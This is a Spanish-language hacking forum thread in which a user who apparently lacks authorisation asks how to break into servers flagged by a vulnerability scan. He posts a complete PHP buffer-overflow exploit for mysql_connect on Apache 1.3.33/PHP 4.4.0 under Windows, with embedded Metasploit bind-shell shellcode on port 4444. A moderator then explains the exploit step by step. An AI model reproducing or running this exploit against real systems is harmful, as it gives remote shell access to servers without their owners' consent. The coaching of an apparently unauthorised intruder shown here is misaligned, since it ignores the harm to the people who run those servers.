Resultados 1 al 7 de 7

multiple vendor server response filtering weakness

  1. #1 multiple vendor server response filtering weakness 
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.451
    Descargas
    11
    Uploads
    0
    me he topado con esta vulneravilidad. "multiple vendor server response filtering weakness"

    por telnet entre >open ip 21

    me pide nombre de usuario y contraseña
    que hago?


    tambien econtre
    PHP MySQL_ conect remote buffer overflow
    Sendmail Malformed MIME Message Denaial of service

    ta y unas cuantas mas

    Ayuda
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  2. #2  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Eso son vulnerabilidades existente sólo en equipos con unas versiones determinadas y sin parchear, con acceso a través del firewall, etc (debes mirar si son explotables sólo localmente o también remotamente)

    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  3. #3  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.451
    Descargas
    11
    Uploads
    0
    encontre un exploit para
    PHP MySQL_ conect remote buffer overflow

    Código:
    <?php
    
    //Exploit for
    //	Apache/1.3.33
    //	PHP/4.4.0
    //Windows only
    
    $eip = "71AB5651";  //EIP - CALL ESI from Winsock 2.0 ws2_32.dll v5.1.2600.0
    $esi = "10000000";  //ESI - Temporary. The memory under this location will be trashed.
    
    //Metasploit win32 bind shell on port 4444
    //Thread exit method, no filter
    $shellcode = pack("H*","fc6aeb4de8f9ffffff608b6c24248b453c8b7c057801ef8b4f188b5f2001eb498b348b01ee31c099ac84c07407c1ca0d01c2ebf43b54242875e58b5f2401eb668b0c4b8b5f1c01eb032c8b896c241c61c331db648b43308b400c8b701cad8b40085e688e4e0eec50ffd6665366683332687773325f54ffd068cbedfc3b50ffd65f89e56681ed0802556a02ffd068d909f5ad57ffd6535353535343534353ffd06668115c665389e19568a41a70c757ffd66a105155ffd068a4ad2ee957ffd65355ffd068e549864957ffd650545455ffd09368e779c67957ffd655ffd0666a646668636d89e56a505929cc89e76a4489e231c0f3aafe422dfe422c938d7a38ababab6872feb316ff7544ffd65b57525151516a0151515551ffd068add905ce53ffd66affff37ffd08b57fc83c464ffd652ffd068efcee06053ffd6ffd0");
    
    //Endian conversion
    $eip = substr($eip, 6, 2) . substr($eip, 4, 2) . substr($eip, 2, 2) . substr($eip, 0, 2);
    $esi = substr($esi, 6, 2) . substr($esi, 4, 2) . substr($esi, 2, 2) . substr($esi, 0, 2);
    
    $overflowstring = "localhost:/";
    $overflowstring .= "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";
    $overflowstring .= pack("H*",$eip);	//EIP
    $overflowstring .= pack("H*",$esi);	//ESI
    $overflowstring .= "/";
    
    //If we don't define this, our shellcode gets truncated
    $two = "AAAAAAAAAA";
    
    mysql_connect($overflowstring, $shellcode);
    
    ?>
    creo que es para remoto, no se, ustedes me pueden ayudar?

    no manejo este lenguaje, segun he leído me conviene hacerlo desde linux,pero hace mucho que me quede sin linux (ralladura en el Cd de instalacion). no se...
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  4. #4  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Cita Iniciado por Cypress
    creo que es para remoto, no se, ustedes me pueden ayudar?
    PHP MySQL_ conect remote buffer overflow ??

    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  5. #5  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.451
    Descargas
    11
    Uploads
    0
    por eso dije creo. pero... me pueden ayudar? no pido paso por paso, pero orientenme y yo busco
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  6. #6  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.773
    Descargas
    31
    Uploads
    8
    //Exploit for
    // Apache/1.3.33
    // PHP/4.4.0
    //Windows only

    Creo que de Linux nada, pero estoy venga a leer el codigo php y solo lo veo logico como local, no como remoto...
    Lo que hace es empaquetar los datos segun el formato, que es hexadecimal.
    Y luego busca el desbordamiento del buffer
    Pero lo del localhost habria que poner la ip del server, en cualquier caso
    Citar  
     

  7. #7  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Desde linux se puede explotar igualmente, es un PHP. Lo que dice ahí es "quién" es vulnerable.


    Cita Iniciado por cypress
    por eso dije creo. pero... me pueden ayudar? no pido paso por paso, pero orientenme y yo busco
    cypress, no tienes que buscar nada. Está ahí todo.

    Trataré de explicarlo paso a paso (disculpad mis errores):

    Código:
    $eip = "71AB5651";  //EIP - CALL ESI from Winsock 2.0 ws2_32.dll v5.1.2600.0
    No hace falta explicar mucho, traduciendo dice:"EIP - Llama a ESI desde Winsock 2.0 ws2_32.dll
    Código:
    $esi = "10000000";  //ESI - Temporary. The memory under this location will be trashed.
    También está bastante claro: "ESI - Temporalmente. Lo memorizado en este región de memoria será desechado".

    Código:
    $shellcode = pack("H*","fc6aeb4de8f9ffffff608b6c24248b453c8b7c057801ef8b4f  188b5f2001eb498b348b01ee31c099ac84c07407c1ca0d01c2  ebf43b54242875e58b5f2401eb668b0c4b8b5f1c01eb032c8b  896c241c61c331db648b43308b400c8b701cad8b40085e688e  4e0eec50ffd6665366683332687773325f54ffd068cbedfc3b  50ffd65f89e56681ed0802556a02ffd068d909f5ad57ffd653  5353535343534353ffd06668115c665389e19568a41a70c757  ffd66a105155ffd068a4ad2ee957ffd65355ffd068e5498649  57ffd650545455ffd09368e779c67957ffd655ffd0666a6466  68636d89e56a505929cc89e76a4489e231c0f3aafe422dfe42  2c938d7a38ababab6872feb316ff7544ffd65b57525151516a  0151515551ffd068add905ce53ffd66affff37ffd08b57fc83  c464ffd652ffd068efcee06053ffd6ffd0");
    Es el shellcode que se ejecutará al explotar la vulnerabilidad.

    Código:
    //Endian conversion
    $eip = substr($eip, 6, 2) . substr($eip, 4, 2) . substr($eip, 2, 2) . substr($eip, 0, 2);
    $esi = substr($esi, 6, 2) . substr($esi, 4, 2) . substr($esi, 2, 2) . substr($esi, 0, 2);
    http://es.wikipedia.org/wiki/Big-endian

    Código:
    $overflowstring = "localhost:/";
    $overflowstring .= "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  ";
    $overflowstring .= pack("H*",$eip);	//EIP
    $overflowstring .= pack("H*",$esi);	//ESI
    $overflowstring .= "/";
    Crea la variable $overflowstring a la que va añadiendo todo lo necesario para el funcionamiento del exploit

    Código:
    mysql_connect($overflowstring, $shellcode);
    Realiza la petición al servidor, desbordando la memoria y haciendo que se ejecute el shellcode.

    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

Temas similares

  1. OpenSSH Challenge-Response Buffer Overflow
    Por melmak7 en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 09-06-2004, 12:14
  2. Respuestas: 0
    Último mensaje: 14-04-2003, 11:16
  3. Respuestas: 0
    Último mensaje: 12-04-2003, 11:20
  4. Multiple incorrect permissions in QNX
    Por TseTse en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 20-11-2002, 23:25
  5. Necesito Licencias de NT server o 2000 Server
    Por osoblanco en el foro HACK HiSPANO
    Respuestas: 1
    Último mensaje: 23-01-2002, 09:37

Marcadores

Marcadores